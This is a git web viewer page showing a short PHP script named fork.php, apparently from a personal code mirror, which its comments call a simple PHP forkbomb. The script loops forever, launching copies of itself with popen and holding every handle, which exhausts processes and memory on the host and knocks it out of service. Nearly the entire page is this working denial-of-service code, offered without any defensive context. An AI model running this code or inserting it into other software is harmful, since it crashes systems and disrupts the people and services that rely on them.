Added lot of junk laying around on harvie.cz
[mirrors/Programs.git] / php / skripty / fork.php
CommitLineData
8de51304
H
1<?php\r
2//PHPForkBoom\r
3//Harvie 2oo7\r
4//Simple PHP forkbomb implementation\r
5\r
6$i = 0;\r
7while(1) {\r
8 $fp[$i] = popen($argv[0], "r");\r
9 $i++;\r
10}\r
11\r
12?>\r
This page took 0.110696 seconds and 4 git commands to generate.